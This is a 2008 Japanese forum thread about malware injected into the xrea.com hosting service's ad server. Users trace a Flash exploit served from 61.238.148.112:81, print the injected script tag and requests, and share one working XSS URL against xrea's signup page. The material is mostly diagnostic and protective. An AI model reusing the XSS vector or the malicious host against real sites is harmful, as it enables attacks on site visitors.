xrea.com part131

061238148112●ctinets●com って （www●.）ddaio●com か？ブラックだよな、これ

ddaio●comでググると『このサイトはコンピュータに損害を与える可能性があります。』

>>594
報告乙

つか、結局のところ管理画面に入れない理由って何？

データベースが逝ったのか、その他の原因なのか、
もしくは原因すらいまだに分かってないのか。

>>596はなんの話？

61.238.148.112:81の話

ttp://pc11.2ch.net/test/read.cgi/hosting/1211121853/504-

>>598
>>596は広告が常に安全じゃないと警告している偉い人。

運営がサポ板でもこの関連の話を完全に無視してるのがおかしいよな

ネトゲの垢ハック仕込まれるってのをどっかで見たけど
ネトゲやってなかったら関係なくね

61.238.148.112ってhellh.netとかいう
ネトゲの垢盗むウィルス撒き散らしてる危険サイトのIPじゃない？
なんとなくググってみただけだけど

>>603
こーいうやつは今すぐネット上から消えて欲しいよなぁ
被害者は同時に加害者になりうるのがウイルス（・ワーム・トロイ）被害の問題なのに

ネトゲが狙われてるのは、手軽なマネーロンダリング手段になってしまっていることや
こいつのように所詮ゲームというマスゴミ脳のやつのせいで、まともな対処・対応をせず
被害が拡大する土壌になってしまっていることもあるわけで。。。
昔と比べると警察も動くようにはなってるものの、辿った結果、海を越えてしまうと
そこで途切れてしまってるんだよねぇ。

あとは、海を超えてないけど、ODNが発信源の攻撃（改竄）が絶えないのは何だろうなとか。

[61.238.148.112:81] 普通のサイトを開設。
↓
[61.238.148.112:81] XREAに広告申請。
↓
[XREA] 普通のサイトなので受理。
↓
[61.238.148.112:81] 受理されたので、ウイルスサイトに書き換え。
↓
[61.238.148.112:81] 広告踏んだヤツ涙目m9(^Д^) ←いまココ

XREAに61.238.148.112:81がウイルスサイトですよって
淡々と報告すればいい話だと思う。

それか月200円くらい払っちまえばいい話。

また手動挿入広告表示すると61.238.148.112:81に接続するようになってるけど？
昨日は除去されてたんだけどなあ

マジで運営と犯人がイタチごっこしてね？
それとも犯人がウイルス入れたり消したりしてんのか？

>>606 それか月200円くらい払っちまえばいい話。

なんだその「上納金」みたいなのは。↓を思い出した

「脅迫ウイルス」が再び出現，より強力な暗号でファイルを“人質”に
ttp://itpro.nikkeibp.co.jp/article/NEWS/20080609/307007/

>>607
だからまだ対処されてないんじゃね？
s143だってまだ対処されて無いでしょ。

つか、1週間くらい表示されなくなったら報告してくれよ。
いい加減「除去された」「まだだ」「除去された」はウザったい。

手動挿入広告つーか
<script type="text/javascript" src="http://imgj.xrea.com/xa.j?site=xxx.sxxx.xrea.com"></script>
↑のタグ読むと[61.238.148.112:81]へ接続しようとする(俺はPerrGuardian2ってので遮断してる)
ローカルで上のタグ入れてページ表示しても[61.238.148.112:81]を弾く
俺がわかるのはここまでだから後は詳しい人頼む

>>609
こうしてる間にウイルスがまき散らされてるかもしれないのに黙って見てろって？
いくつかサポ板に報告してる奴がいるけど、それも全て無視されてるんだぜ？

>>609
お前もスルーすることを覚えてくれ・・・
今ここに書いてるやつは、XREAユーザじゃなくてただの荒らしだ。

>>612 今ここに書いてるやつは、XREAユーザじゃなくてただの荒らしだ。
自己紹介乙

xreaはちゃんと管理している。問題ない。

>>614
私もそう思います。

よし、話を普通の話題に変えようか。
料金についてだが毎月200円は安すぎないか？
もっと値上げしてもいいと思うんだがな。

糞rea運営うぜー

ほんとお前ら平和ボケもいいとこだなｗ
運営の広告が改竄される＝お前らのＨＰだって改竄される可能性がある。
それどころか個人情報が漏れてる可能性だってあるのにｗｗ
それでも使いたけりゃ使えばいんじゃない？ｗ

ｗｗｗ

s143だけど、FFFTPは接続できるんだよね。

いったいどうなってるんだろ？

FTPできなくなるまえに移転だな…

s143なんだけど、いつもvalue-domainから管理画面に入ってたせいで
FTPパスワードが分からないorz

パスワード再発行って管理画面は入れないとどうしようもないよね？

xreaから登録時に来るメールにパスワードは書いてあるよ。

自分が借りてる鯖も、いつぶっ壊れるかと思うと気が気でない。
早く移転した方が良いかなぁ。

また61.238.148.112:81へアクセスしなくなってる
運営ここ監視してやがるな
日曜にここで話題でるまでずっと放置だったのに
ここ最近は書き込みあるとすぐ修正されてる

複数の広告がラウンドロビンしてるとかじゃなくて？
こんなとこ監視してる暇はないだろｗ

なんかもうマジで倒産の香りが
取り敢えずバックアップは取っとけ

s143住人は今のうちに移動した方がいいんじゃないか？
200番台後半が募集しているよ。


>>627
有料鯖とドメイン代の稼ぎじゃ運用はムリか？
無料人が減ったらそれなりに負担も軽くなるし、
無料の選択肢が無くなったら月200円程なら払うのもいるだろ。

>>606は勘違いしているけど、
特定の広告を表示すると[61.238.148.112:81]に接続するのではない。
ttp://imgj.xrea.com/xa.j を読み込むと[61.238.148.112:81]に接続する。
どの広告とか関係なく、そのタグ埋め込んでるページは全て。
いつも夕方になると[61.238.148.112:81]に接続しなくなっているから
時間限定か、運営もしくは犯人が書き換えてるかのどちらか。

s342でxrea.jp使いたいんだけど反映されてる人いる？
もう一週間以上待ってるんだけど・・・

3年以上前のメールを漁るしかないのか…

万一倒産したら、デジロック名義のドメインたちはどうなるんだろ。
差し押さえの対象になったりしないよね？

>>629
Firefox使ってるならLive HTTP Headerを使うと
request内容の報告がしやすいよ。
https://addons.mozilla.org/ja/firefox/addon/3829

tracerouteを取ると、s*.xrea.comは大阪kddi経由で鯖に行っているけど、imgj.xrea.comはSAKURAの中に行っている感じなんだ。
まさか、な……

>>633
imgj.xrea.com
6 9 ms 9 ms 10 ms as2514.nspixp2.wide.ad.jp [202.249.2.115]
7 10 ms 9 ms 9 ms xg2-3-kanda-core11.sphere.ad.jp [202.239.114.45]
8 10 ms 9 ms 9 ms g3-0-kanda-core3.sphere.ad.jp [203.138.72.65]
9 10 ms 9 ms 9 ms g0-12-kanda-arena-gw26.sphere.ad.jp [202.239.114.23]
10 11 ms 15 ms 13 ms j1.ax.xrea.com [210.153.116.18]

s143.xrea.com
5 17 ms 17 ms 17 ms 124.211.14.9
6 32 ms 31 ms 10 ms otejbb204.kddnet.ad.jp [59.128.7.2]
7 11 ms 31 ms 11 ms sjkBBAC06.bb.kddi.ne.jp [210.234.225.246]
8 19 ms 18 ms 24 ms 125.53.98.210
9 19 ms 20 ms 19 ms obpBBML14.bb.kddi.ne.jp [222.227.1.34]
10 20 ms 20 ms 27 ms obp-OskchuobiruML01.bb.kddi.ne.jp [222.227.25.35]
11 * * * Request timed out.
12 20 ms 19 ms 37 ms s143.xrea.com [222.227.75.8]

xreaがどこかみたいに脚光を浴びたらどうしましょう。

tar -cvjf public_html.20080611.tar.bz2 public_html
バックアップ完了

>>633
↓これか？
ARP Spoofing
ttp://support.sakura.ad.jp/page/news/20080602-001.news

とりあえず広告を表示していなければ
自分のサイトのユーザーには無害？

>>636
telnet使えるわけねーだろﾌﾟｹﾞﾗ

nslookupすればわかるけど, imgj.xrea.comは以下の5箇所のラウンドロビン：

59.106.22.138 → さくら.
202.181.97.140 → さくら.
202.181.97.153 → さくら.
202.229.187.26 → デジロック直轄. 上位はNTT.
210.153.116.18 → NTT.

IPによって61.238.148.112に繋がる繋がらないの違いがあるかは未確認.

>>633
またさくらインターネットか

って言いたいが>>634のどれがさくらか分かんね

>>640
また、さくらなのか・・・？

またって、以前もあったのかよ

>>639

>>640
Non-authoritative answer:
Name: j1.ax.xrea.com
Addresses: 202.181.97.153, 202.229.187.26, 210.153.116.18, 202.181.97.140
59.106.22.138, 202.229.187.26
Aliases: imgj.xrea.com

ま た さ く ら イ ン タ ー ネ ッ ト か ！
前回アタックされたのは「219.94.145.0 〜 219.94.145.127」

>>644
（ここ見ているだけのやつに）telnet使えるわけねーだろﾌﾟｹﾞﾗ

ということなんじゃねーの

広告と同じ位置にiframe埋め込まれてたら
そうもんなのかも？って勘違いするかもな。

今の時代はsshですね、わかります。

>>643

>>637 とか

データセンタ内のARP spoofing攻撃で通信改ざんが発生、対策の定石は?
ttp://slashdot.jp/security/article.pl?sid=08/06/05/008238

セキュリティホール memo
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2008/06.html#20080604__yuzu

cdとlsが使えないからものっそい面倒くさいけどな

まｗｗｗｗｗｗｗｗｗｗｗｗｗｗさｗｗｗｗｗｗｗｗｗｗｗｗｗｗかｗｗｗｗｗｗｗｗｗｗｗｗｗ

>>650
金払うか、新しいサーバに移動してね♪ by XREA.COM

>>652
バックアップの時ぐらいしか使わないから遠慮します♪ by 無料ユーザ

昔はxreaっつーよ良鯖のイメージが強かったのに、なんか酷いな。
coreserver契約したばっかだけど、やめた。解約しよう。
デジロックに不信感募りまくりだわ。
あぁ、引越しﾏﾝﾄﾞｸｻ

コアを始めた頃からどんどん質が下がってるな
現状だと安かろう悪かろうの中国産食品みたいになってる

アウトソーシングでマジに中国現地民がバイト管理してたりしてな…

netgamers.jpもSAKURAだったっけか。相当、シナ畜から狙われてるな。xrea利用者としては、いい迷惑だぜ。

薬屋のページ相変わらずみにくい。。。

http://ness.s16.xrea.com/img/src/1212939198859.jpg

>>650
lsもcdも使いまくれるんだが、これは取得したドメインを割り当ててるから？
今もうひとつ無料アカウント取ってみたら、おんなじ鯖なのに使えない。

>>660
XREA+だと使えるっぽい。
ただ利用権購入して直ぐには反映されないけどな。
最長で24hくらいかかる。

>>640
夕方頃除去されたっぽいぞ
IP変えて何度も広告表示してるが61.238.148.112に接続はない

不明確な情報と云うことですね

っぽいのはわかるが、公式見解が出ないから不信感が増大するわけだが。社員さーん、そろそろ出番ですよ。ここじゃなくて、公式サイト上でいいからさ。

>>640
>202.181.97.153 → さくら.
仕込まれたのは、このIPに該当する鯖だった様子。
やはり、また……

馬鹿な報告しか出来ないヤツが多いので
>>632のツールを使ってみた。
http://2sen.dip.jp/cgi-bin/upgun/up1/source/up15982.zip

GET /jpcount//stat.asp?style=&referer=http%3A//imgj.xrea.com/ad_iframe.html&screenwidth=1024 HTTP/1.1
なんてアクセスあるけどヤバい？
詳しいやつ、解析頼んだよ〜

馬鹿とか言いながら自分も他人任せですか

>>666
GET /show.php HTTP/1.1
Host: 1039045744:81

1039045744:81→61.238.148.112:81

まだ直ってないな。ﾀﾞﾒﾎﾟ (･ω･｀)

昨日の夜は大丈夫だったんだが、また復活してるな
自分のIPは特に変わってないところからすると時間で決まってるのかねぇ

広告にトロイが仕掛けられなくなるまで非掲載にしますね。

>>670
たぶん時間じゃない。

>>666で61.238.148.112:81に接続した後、
50回連続で読み込みを行っても再接続できなかった、
ブラウザ終了(クッキー削除)＋繋ぎ変えしたらまた接続した。

>>668
IPアドレスがそんな書き方できるとは知らなかった。

運営の対応がお粗末すぎないか？

その辺は昔から変わらずだよ。

広告鯖はラウンドロビンだろ。どこに繋がるかはそのとき次第だっつの。
そして、まったく状況は改善されていない。

xreaの問題じゃなくgoogleアドセンスの問題です。

同じサイトは何回更新しても61.238.148.112:81にアクセスする
てより手動広告のは俺の環境だと今現在全部61.238.148.112:81にアクセスする
んでやばいのは>>629のアドレスじゃなくて
広告タグ内の　http://ad.xrea.com/ad_iframe.fcg?〜
ってのかも

アドセンスの問題というならそれはそれだが、アドセンスはフィルタの設定が
できるわけで、実害があるのにできる対処をやらない広告表示者（xrea）にも
問題アリだな。

アドセンスは無関係
試しに自分の借りてる鯖で
１．ノーマル広告
２．手動挿入広告
３．手動挿入広告からiframeタグを除去
やってみ？

表示される広告は全部同じValue-Domainの広告だけど
61.238.148.112:81に接続するのは３．だけだから

訂正。
>61.238.148.112:81に接続するのは３．だけだから
61.238.148.112:81に接続するのは２．だけ

ということは
手動挿入してiframeを無くせばおｋ？

今のところはね

-----ここから-----
<script type="text/javascript" src="http://imgj.xrea.com/xa.j?site=xxx.sxxx.xrea.com"></script>
-----ここまで-----

>>666は↑だけ書いて試したけど
61.238.148.112:81に接続してるよ。

-----ここから-----
<IFRAME HEIGHT="60" WIDTH="468" FRAMEBORDER="0" MARGINHEIGHT="0" MARGINWIDTH="0" SCROLLING="NO" ALLOWTRANSPARENCY="TRUE" SRC="http://ad.xrea.com/ad_iframe.fcg?">
</IFRAME>
-----ここまで-----
↑だけでも61.238.148.112:81に接続するね
つまりコレと>>683のどっちもアウトってことだな

解析終了！

>>666で/show.phpってファイルにアクセスしてるけど
これがFlashプレーヤーの脆弱性を突いたファイルを読み込ませようとしてる。
????.swf、???.swfやらが脆弱性を突いたファイルだと思われる。

Flashプレーヤーを最新版にしてれば問題ないとは思う。
サポ板に誰か報告しといて。

ちなみにFlashプレーヤーのバージョン確認。
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm

バージョンが9.0.124.0なら問題なし。
9.0.115.0以下だとヤバイかも。

どうすれば良いんですか＞＜
広告全部消せば良いんですか＞＜

Strictマンセーってことだな

>>687
ごめん、XREA+ユーザーだから広告とかは分からない。
>>683でも書いてるけどわざわざ広告を呼び出して確認してるし。

XREA+に入れば広告は消えるとは思う。

広告に罠しこまれてるようなところが
広告消したからといって安全だなんて言えないだろう

犯罪者と契約してるのはアドセンスだろ。

だからアドセンス無関係だってのｗ

>>689
>>684も同じ代物？

>>690
XREA.COMがなんかしてるんじゃなくて
「imgj.xrea.com」が乗っ取られてる。

C:\>nslookup imgj.xrea.com
Non-authoritative answer:
Name: j1.ax.xrea.com
Addresses: 202.181.97.140, 202.229.187.26, 210.153.116.18, 202.229.187.26
59.106.22.138, 202.181.97.153
Aliases: imgj.xrea.com

フラッシュプレイヤーのバッファオーバフロー脆弱性だろ？
最新のにとりあえずアップデートしとけばいい
利用者にも最新のつかってなかった場合アップデートをするよう促すような通知をしたいが
こちらから使ってるフラッシュのバージョンって調べることができないんだよな・・・

↑の「Addresses:」のどれか(または、全部)が
ARP Spoofingあたりで乗っ取られているんだと思う。


ま た さ く ら イ ン タ ー ネ ッ ト か っ


じゃないかと疑ってる。

>>695
JavaScriptでFlashプレーヤーのバージョンは取得できるよ。

61.238.148.112:81もJavaScriptで判断して
embedするFlashファイルを選択しているくらいだから。

>>696
>>640

もともと、imgj.xrea.comをデジロックの鯖以外（さくらの鯖）に分散させていたってこと？

んで、さくらのルーターがARP Spoofingをうけていると？

>>698
もう解析されてたのね。

>>699
たぶんそう。
さくらインターネットのサポートに連絡した方がよさそう。

http://ad.xrea.com/のほうはどうなのよ？
こっちも61.238.148.112:81に接続するけど

>>701
それは302で転送されてるから。

ttp://ad.xrea.com/ad_iframe.fcg
↓
ttp://imgj.xrea.com/ad_iframe.html

HTTP/1.x 302 Found
Date: Thu, 12 Jun 2008 03:23:13 GMT
Server: Apache
Location: http://imgj.xrea.com/ad_iframe.html
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

さっきから説明のためにリンク書いてしまってるけど

絶 対 に 踏 む な ！

フラッシュ最新でFirefox3ならだいじょうぶ？

>>704
大丈夫とは言い切れないが、
現時点じゃフラッシュを最新のにするのが最良。
脆弱性なんてのはどこにでも潜んでいるから、
IT関連のニュースサイトの定期ヲチを推奨。

>>687
結局はそう言う事だね。
月200円で広告に関連する呪縛から解放される。
他にも色々アップするからXREA+にしたら？

有料プランの宣伝はいいから、早く修正してくださいよ社員さま

>>704
たぶん大丈夫じゃない？

ただ全ファイル解析したわけじゃないし
こうしてる間にもJavascriptの中身を書き換えて
別のウイルスを配布するかもしれないし責任は持てんよ。

広告付けてる人ってのはxrea+ユーザーが無料で1つ貰える無料鯖を使ってる人でしょ。
そんなもんのためにさらにもう一つ課金するわけにはいかんわな。

公式アナウンス出せや糞運営

糞ユーザーうるさい

さっさと無料鯖なんかやめちまえばいいんだ

.htaccessにLayoutIgnoreURI *を書けば良いんですね。わかります。

これは広告免除契約させる罠
さすが糞れあ汚い、汚すぐる

日本人は誰も広告なんてクリックしないもんな

外人さんはクリックするの？

お前ら何の確証もないのにARPスプーフィングARPスプーフィング言うなよ
SUKUARAサーバに対する風評以外の何物でもないぞ

202.181.97.140 SAKURA
202.181.97.153 SAKURA
202.229.187.26 DIGIROCK(NTTPC)
210.153.116.18 NTTPC
59.106.22.138 SAKURA

for i in 202.181.97.140 202.181.97.153 202.229.187.26 210.153.116.18 59.106.22.138; do
echo $i; wget -qO- http://${i}/ad_iframe.html | md5sum; echo
done

202.181.97.140
061a0dbc17873ef1d655093b47eb5a93 -

202.181.97.153
bae3970b24cad8473cef20d8b7cd0085 -

202.229.187.26
061a0dbc17873ef1d655093b47eb5a93 -

210.153.116.18
061a0dbc17873ef1d655093b47eb5a93 -

59.106.22.138
061a0dbc17873ef1d655093b47eb5a93 -


202.181.97.153 だけ返ってくる内容が違うんですよ

SAKURAの社員か株主でも来たか？

事実を述べて警告してるだけだろうに
風評とかばかじゃないの？死ぬの？

>>721
もっとやんわり言ってやれってば。
報復にリアルで何しでかすかわからんぞ。
怖い怖い。

http:// 202.181.97.150 /

http:// 202.181.97.153 /

http:// 202.181.97.153 /ad_iframe.html
<SCRIPT LANGUAGE="Javascript" SRC="http://****:81/jp.js"></SCRIPT>

http:// 202.181.97.156 /


前後のIPアドレスを持つホストは同一ネットワーク上に存在するだろうと推定すると、
特定のサーバ(202.181.97.153)の特定のページ(ad_iframe.html)だけに、
外部のJavaScriptファイルを実行するようなコードが挿入されています
つまりネットワークは無関係だということです
単に一つのサーバだけの問題です
事実をろくに検証もせずに一点だけ捉えてただどこが悪いだのと述べるのは、
警告でも何でもなくてただの風評ですよ
ARPSpoofingだとか無責任に言っていた人間は切腹なさい

age

もっと簡単に言ってくれ。
つまりxreaは無実とか？

今回の件をARPSpoofingだと言ってるやつって誰のこと？

「『また』ARPSpoofingの件があったSAKURAか」っていう
話なんじゃないの？何を必死になってるの？

>>726
>>699-700

過去ログも読めないんですね
666と一緒に切腹なさい

切腹ってｗｗｗ
なんでそんなに必死なの？ｗ

しゃべり方がキモイな
切腹なさい
ｗｗｗｗｗｗｗｗｗｗｗｗ

SAKURA社員必死だな
こんなところで火消ししてないで、早く対策してください＞＜

痛い子が現れた！

コマンド：

>>725
ARPSpoofingの可能性はないということです
IPアドレスとして202.181.97.153を持つサーバに関しておかしいんでしょう
SAKURAのネットワークにあるサーバであることは間違いありませんが、
それをSAKURAの責任論と無理矢理結び付けようとする人たちは、
みんな仲良く切腹なさい

切腹なさいとかｗｗｗ
又吉の真似でもしてるつもり？

必死じゃありませんよ
ただ事実ではないことを事実であるかのように言う人間の言うことを否定しているに過ぎません
事実を言おうとするならきちんと検証してから言いなさいと言っているんです
それもせずに根拠もなくARPSpoofingだの言う人間は無責任以外の何者でもありません

落ち着こうぜ。

で、さくらが問題あるのかxreaが問題あるのかどっち？
広告から怪しいIPに接続する問題は発生から丁度一週間経ったけど？

さくら社員だということは否定しなかったぞ、こいつ

>>736
プロバイダの一人のユーザだけがクラックを受けても、
プロバイダの責任にならないのと同じであることを考えれば分かるでしょう
誰に最も責任があるのか？
クラックした人間です

つまりxrea社員とさくら社員がこのスレで責任を押し付けあってるわけですね、わかります。

>>738
つまり個人情報が不正アクセスで盗まれたとしても
管理の不手際に関係なく責任の全ては不正アクセスをした犯人にのみあるんですね

なんというノーガード戦法
信用がガタ落ちするぞｗｗｗ

>>740
前から思ってるんだけど、連帯責任っておかしいと思うんだ

＞＞７４０
鯖の管理に不手際があれば、当然管理する側の責任もあるだろ
全部犯人のせいとかアホすぎｗｗｗ

クラッカーのせいにするなら鯖屋辞めろよ

仕事あらかた片付いた。

>>719
特定乙
IP直接指定すればよかったんだねー

>>723
ARPテーブルを書き換えたのが、
202.181.97.153だけだったんじゃない？

202.181.97.153が問題あるのははっきりしてるから
さくらインターネットからそのうち何かしらの報告あるんじゃない？
http://support.sakura.ad.jp/page/mainte/all

どういう対策すればいいのかな。

件の降ってくる罠swfが実行するexeのスキャン。
ttp://www.virustotal.com/analisis/43d7a255268124e7572bb214aa39c026
ちなみに当該IP(香港)は数ヶ月前にFC2ブログをハックしたfccjaと同じ。

広告ページが汚染されているなんて大問題ですね
みんなでxreaの運営側にメール送った方がいいかも知れません
閲覧側ができる対策としては、脆弱なソフトウェアをアップデートし、
その上で61.238.148.112行きのパケットを遮断することしかありません
何も知らない、脆弱性を持った環境からの閲覧者は感染することでしょう

object(略)swflash.cab#version=9,0,124,0とかやった
てきとーなサンプルFlashを置いておくとか。

じきにどっかで記事になるかな？

どこか(さくら?)が公表しない限り記事にはならないと思う。

>>732
>> SAKURAのネットワークにあるサーバであることは間違いありませんが、
>> それをSAKURAの責任論と無理矢理結び付けようとする人たちは、

202.181.97.153を所有・運営・管理しているのは誰だい？
SAKURAのネットワークにあるサーバであればSAKURAの責任ではないのか。
DIGIROCKが借り上げてroot権限を持つならDIGIROCKの責任だが。


>>746
対策も何も広告を入れなきゃいけないんだし、改善されるのを我慢して待つか、
SAKURAに直談判に行くか、1ヶ月でも3ヶ月でも一時有料に待避するかぐらいだと思うよ。

まだあった。これが一番現実的かもしれない。

DIGIROCKに対して20〜30人ぐらいで一斉に、
正確な情報とそこから推測される悪影響を提示して、
状況が改善されるまで広告挿入の中断を要求したらいい。
（改善後に広告挿入の再開も約束も入れてな）

運営側に非がある訳だから垢削除とかは言い出さないだろうと思うが。

管理者に責任ないなら、ひろゆきだって苦労しないわな

専用スレ立てるか？そしたら少しは話題になるだろ(笑)

俺は何もしないから皆はしっかりと行動してくれ。頼んだぞ。

俺も俺も

http://www.xrea.com/?action=signup1&server=%22%20onmousemove%3d%22document%2ewrite%28%2fxss.By.kusai%2f%29

xss対策もできてないなんて＞＜

61.238.148.112云々でノートンが激怒したからなんだと思ってみたら

f115.swf

fccja.com:81/taa.gifを呼び出してるみたい

>>760
>>747
スカったとこには検体提出済み

広告免除・許可に思いっきり業者の書き込みがあるんだが消されてない。
サポート板見てないだろこれ。

　　　　　　　　　　　　　　　　　　　　　　　　　　　　　 ＿_
　　　　　　　　　　　　　　　　　　　　　　　　　　　＜⌒

　　　　　　　　 　 　 　 　 　 　 　 　 　 ／
　　　　　　　　　　　 　 　 　 　 　 　 , '　　　　　　　　　　 　 　 　 　 　 　 　 　 ヽ
　　　　　　　　　　　　　　　　 　 　 /ｘｬ≠=xﾍ._rx,＿＿＿_　　　　　　　　 　 　 　 ＼
　　　　　　　　　　 　 　 　 　 　 ,ｨ彡≦云7ij{KﾙﾊＹ价ﾄｘｨfiｘ.　　　　ヾ　　　　 　 　 _｝
　　　　　　　　　　　　　　　　　厶ｨ仏ｨj爪{{代ﾘﾊﾐ刈i州込j小ﾐｘ　　 ＼y厶　　＜¨´
　　　　　　　　　　 　 　 　 　 　 ん仂仏ｉ仏{十トﾊjﾘﾙｬ十トﾙﾘfﾄミｘ　 ､〉　　　　　 _
　　　　　　　　　　　　　 　 　 　 �Y刈ﾘﾘ{ ,ｨ≠ﾐ　　'′,≠竺Xミ}jﾊｉﾄﾐY’　 　 　 ／ﾉ
　　　　　　　　　　　　　　　　　 　 �Z}jﾘ}l.“rf{ﾊ　　　��ｨf}_}ﾊ �Yﾙ}ﾊﾊ!　＿,ｨア’_厶 -ｯ
　　　　　　　　　　　　 _,.　 ≠ｬ云乏7ﾙﾊ. j,以}　 ,　　　廷jりj仏ﾙ}j｣才＾/＾　　　 ,ｨ≦.._
　　　　　　　　　　　,ｨ{�a´,ｨi斥云ｧ仏ﾊ圦　　　 ﾏ　ﾌ　　　_厶斗fﾌ~　　{ 　 　 　 -- ｯ┘
　　　　 　 　 　 　 ;i�h　〃仂ｉ�hｨﾊ{込ﾐ弍≧竺ミｘ斗ｬf{厂　　 /′　　ﾉｯｧ‐--‐'¨¨´
.　　　　　 　 　 　 {{{　 ん忻ｉ仏kﾊ込乏竺云ア´ 　 　 /′　　　 　 　 ｛ｉ:ｽ
　　　　　　　　　 　 　 价ﾐ�Wjﾘｿﾊ{{仇��ﾃ¨´　　　　　　　　　　 　 　 _,}j价＼
.　　　　　　 　 　 　 　 �Yﾊ{ {价り�Wﾙ抓　 　 ､　　　　 　 _..≠ｧ允ﾁ灯ﾊiﾊ　 ヽ
　　　　　　　　　 　 　 　 ＾ﾘ �YY圦�Yﾘ沁　 　 ゞ　 -≠¨´　∨iり｝}i川　ｉ}ﾘ　　 )）
　　　　　　　　　　 　 　 　 　 �Yﾘり }ﾙﾐ仏ｘ,＿___　　　　　　 }jﾘ}ﾘiﾉｿﾘ　じz
　　　　　　　　　　　　　　　　　　　　 ｀Ｚ云三竺弐ミｘ,_ _ . イ}}}ﾘﾝji�W
　　　　　　　　　　　　　 　 　 　 　 ／⌒汀＾ﾞﾏ气ﾐﾒ弍/厶jiﾙｚ云彡'
　　　　　　　 　 　 　 　 　 　 　 ／　　 〈 　 　 ＼｀ヾV {
　　　　　　　　　　　　 　 　 　 / 　 　 　 ＼　　＼__ブ} |
　　　　　　 　 　 　 　 　 　 　 |　　　　　　　　　　　 _人!　　　　　　 　 　 　 　 　 　

>>762
デジロックにとってXREAは片手間の副業みたいなもんなんだろうな >>594からしても。

副業ですらないんじゃね？

なんだよこの末期感

とりあえずFWで遮断した。

ワトソンくん、状況を報告したまえ。

ホームズ先生おしえてくだしあ；；

今日、自サイトにアクセスしたら、2度も「Possible_Swif」が検出されたんだけど、
これも広告関連に影響してるのかな？

次スレのタイトルは
【ハッキングされたよ】xrea.com Part.32
とかになっちゃうのか？？

>>770
swif? swfじゃねーの?

s284やべえ

この一件で広告掲載してないユーザーにもとばっちり来るだろうなあ
どうしてくれんだよ

202.181.97.153は逆引きしたホストからして
さくらの専鯖つまりrootはDIGIROCKが持ってる

さくらへ「202.181.97.153にマルウェアをダウンロードさせるコードが挿入されている」と通知したら、
さくらからユーザ(DIGIROCK)に警告が行くかな
そっちの方がxreaユーザがDIGIROCKに言うより対応早そうな気がする

　　　　　　　　*'``・* 。
　　　　　　　　|　　　　 `*。
　　　　 　　,｡∩　　　　 　* 　　　もうどうにでもな〜れ
　　　　　　+　(´･ω･`)　*｡+ﾟ
　　　　　　`*｡ ヽ、　 つ *ﾟ*
　　　　　　　`・+｡*・' ﾟ⊃ +ﾟ
　　　　　　　☆　　 ∪~ ｡*ﾟ
　 　　　　　　`・+｡*・ ﾟ

○ 個人の対策

(1) Windows Updateは必ずする. 当然.

(2) ウイルス対策ソフトは必ず最新版にする.
　　感染するウイルスは最新. データベースが数日古いだけで感知できない.
　　最新版にしたあと, 面倒でもフルスキャンしておく.

(3) Flash Playerは必ず最新版にする.
　　バージョン確認（>>686）：
　　http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
　　最新はWindowsの場合： WIN 9,0,124,0
　　それより古いなら, 最新版をインストール.
　　複数のブラウザを使っている場合は, 全てのブラウザでバージョン確認する.

このコンピュータに対する侵入 「HTTP Adobe SWF Remote Code Exec」 の試みを検出して遮断しました。
侵入者: 61.238.148.112(81)
危険度: 高レベル
プロトコル: TCP
攻撃された IP:
攻撃された ポート: 1228

乗り換え先を検討しないとな

良鯖だったのに、残念だ。。。(･ω･｀)

移転してきたばかりなのに／(＾o＾)＼

xreaみたいに広告位置自由に動かせるとこって
どこがあるのかな？

>>778
PeerGuardian 2で不必要な中韓系サイトへの接続を防ぐ


リネージュ資料室 - ガイド >> セキュリティ対策 （基本的な対策 - IPフィルタ）
http://lineage.paix.jp/guide/security/basic-ipfilter.html

CORESERVER.JPに移転させようとする陰謀じゃないの？

今の現状を見て移転したいと思うか？

え、ちょっとまって何があったの？？

>>758
技術力を示したいのは分かるけど
確実に攻撃に繋げられる方法を提示してどうするんだ。
本気でその投稿は削除してくれ！



◎XREAユーザはマジで注意◎

1. XREAユーザはクッキーを削除する。
2. メールや掲示板からXREAへのリンクがあったとしても
　 絶対にクリックしない。URLがhttp://www.xrea.com/だとしても。

>>758おしちまった／(＾o＾)＼
フラッシュプレイヤーは最新にしてあるが
ウィルススキャンして寝るか

なんか騒がしいけどxrea側には誰か伝えたの？

>>758押しちゃったんだけど、どおなるの？

>>788,790
なにも害はないよ
" onmousemove="document.write(/xss/)
だけだから

ん？無料厨だけだろ
騒がしいの

>>788,790
あのリンク先に飛んでもまったくもって問題ない。
画面に文字列が表示されるだけ。
・・・だけど問題はそうじゃないんだよ。

>>789
DVのサポートに連絡したけどこの時間だから「対応待ちです」だし・・・
2chって>>758は削除対象にならないっぽいし・・・

>>792
202.181.97.153の問題は、Flashのバージョンを最新にしておけば
とりあえず今のところ大丈夫。

だけど、>>758の問題はクリックしたら
Flash云々関係ない。クリック→終了。

DVに相談しても、3倍返しになりそうで怖いね

寝る前にメール見たら、なんかもう変なメール来てるし・・・
http://www.xrea.com/・・・・ と書かれたリンクは絶対クリックするなよー

被害が拡大しないことを祈りつつ寝る。

>>745
さくらのような環境で、一台だけarp spoofってのは考えにくい。
apr spoofingするには、ARPが届く範囲にいなきゃいけないわけで、
つまりどれかのサーバに侵入できたということ。で、侵入できているのなら
わざわざarp spoofingやルーティングテーブルの書き換えをするまでもなく
ファイルを直接さわれるわけ。むしろ、この類の、不特定多数の人間に
マルウェアをダウンロードさせたいパターンでは、それこそ近隣の
サーバ全部にarp spoofingを仕掛けてまるごとおいしく頂くでしょ。

ここの鯖管（平岩健○）が事情聴取されてるみたいだよ
無事にかえってきたらいいんだけど、しばらくは無理じゃないかな

ｋｗｓｋ

>>797
アニヲタを放置してるからか？

観測所の実験か？

情報ソースは

ブルドック

>>802
2ch脳的反射

おっと、反射なら脳まで行かないかｗ

これは常識っていうか前提みたいなものかもしれないけど、
XREA+(PLUS)の7日間お試しプランでとりあえず広告を消しといた。
7日過ぎて未解決だったら問答無用で広告消す。

そしてアカウント削除されるんですよね

トロイを使ってあらゆる情報を抜き取って何が悪いのかわからないアル。

Slashdotに投稿すれば大騒ぎになってくれるんじゃね？

まかせた。

S284は何が起こってるんだ？

画像が表示されずに×印になるよ＜S284

gigazineに誰か投稿して。

たまたま思いついたのがGIGAZINEというふうにしか見えない

意味がワカランす

IT戦士に調査依頼しようぜ

1. >>758の件
XREA → 「専門・担当の者に連絡いたしました。」

2. 202.181.97.153の件
